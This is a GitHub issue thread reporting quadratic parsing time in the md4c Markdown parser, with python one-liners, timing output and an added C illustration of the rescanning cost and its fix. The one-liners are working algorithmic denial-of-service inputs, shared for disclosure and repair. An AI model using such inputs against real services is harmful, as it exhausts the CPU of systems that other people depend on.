Quadratic behaviour on pathological html #73

Closed
marcusklaas opened this issue Apr 29, 2019 · 3 comments

@marcusklaas
commented Apr 29, 2019

Found this vulnerability in pulldown-cmark. It appears md4c is also vulnerable.

python -c 'print("a <![CDATA[" * 10000)' | time md2html/md2html > /dev/null
0.38user 0.00system 0:00.39elapsed 95%CPU (0avgtext+0avgdata 2688maxresident)k

python -c 'print("a <![CDATA[" * 20000)' | time md2html/md2html > /dev/null
1.49user 0.00system 0:01.51elapsed 98%CPU (0avgtext+0avgdata 4204maxresident)k

python -c 'print("a <![CDATA[" * 40000)' | time md2html/md2html > /dev/null
5.96user 0.00system 0:05.99elapsed 99%CPU (0avgtext+0avgdata 7016maxresident)k

@mity
Owner

commented Apr 29, 2019

Ack.

Seems to be also the case for repetitions of a <?

$ time python -c 'print("a <? " * 10000)' | ./md2html/md2html >/dev/null
real    0m0.615s
user    0m0.015s
sys     0m0.031s

$ time python -c 'print("a <? " * 20000)' | ./md2html/md2html >/dev/null
real    0m2.227s
user    0m0.000s
sys     0m0.046s

@mity
Owner

commented Apr 29, 2019

And repetitions of a <!A:

$ time python -c 'print("a <!A" * 10000)' | ./md2html/md2html >/dev/null
real    0m0.529s
user    0m0.000s
sys     0m0.062s

$ time python -c 'print("a <!A" * 20000)' | ./md2html/md2html >/dev/null
real    0m1.890s
user    0m0.015s
sys     0m0.015s

$ time python -c 'print("a <!A" * 30000)' | ./md2html/md2html >/dev/null
real    0m4.169s
user    0m0.000s
sys     0m0.030s

@mity mity closed this in d4d1091 Apr 29, 2019

@marcusklaas

Author

commented Apr 29, 2019

Amazed by the lightning speed turnaround on this! 👀
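
The timings in this thread roughly quadruple each time the input doubles. The following added example (not part of the thread, not md4c's code, and not a description of what commit d4d1091 changed) models that cost: every unterminated `<![CDATA[` opener triggers a fresh search for `]]>` to the end of the text, and remembering that one search already failed makes the work linear. The names `scan_cdata`, `find_closer`, `repeat` and the `remember_failure` switch are hypothetical, and the buffer is assumed to be a single block of text.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added illustration, not md4c source. buf models one block of Markdown text. */
typedef struct { size_t sections, scanned; } scan_stats; /* spans found, positions examined */

/* Search for "]]>" at or after `from`; return its offset, or len if absent. */
static size_t find_closer(const char *buf, size_t len, size_t from, size_t *scanned) {
    for (size_t i = from; i + 3 <= len; i++) {
        (*scanned)++;
        if (memcmp(buf + i, "]]>", 3) == 0) return i;
    }
    return len;
}

/* remember_failure=0: each opener rescans to the end of buf (quadratic).
 * remember_failure=1: after one failed scan, later openers are literal text (linear). */
scan_stats scan_cdata(const char *buf, size_t len, int remember_failure) {
    scan_stats st = {0, 0};
    int no_closer_ahead = 0;
    size_t i = 0;
    while (i + 9 <= len) {
        if (memcmp(buf + i, "<![CDATA[", 9) != 0) { i++; continue; }
        if (remember_failure && no_closer_ahead) { i += 9; continue; }
        size_t end = find_closer(buf, len, i + 9, &st.scanned);
        if (end == len) { no_closer_ahead = 1; i += 9; }  /* unterminated opener */
        else { st.sections++; i = end + 3; }              /* skip past "]]>" */
    }
    return st;
}

/* Constructed input: `unit` repeated n times, as in the one-liners above. */
char *repeat(const char *unit, size_t n) {
    size_t u = strlen(unit);
    char *s = calloc(u * n + 1, 1);
    for (size_t k = 0; s && k < n; k++) memcpy(s + k * u, unit, u);
    return s;
}

int main(void) {
    for (size_t n = 1000; n <= 4000; n *= 2) {
        char *s = repeat("a <![CDATA[", n);
        if (!s) return 1;
        printf("n=%zu rescan=%zu remembered=%zu\n", n,
               scan_cdata(s, 11 * n, 0).scanned, scan_cdata(s, 11 * n, 1).scanned);
        free(s);
    }
    return 0;
}
```

The same reasoning applies to the `<?` and `<!A` inputs reported above, each of which opens a construct whose terminator never appears.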
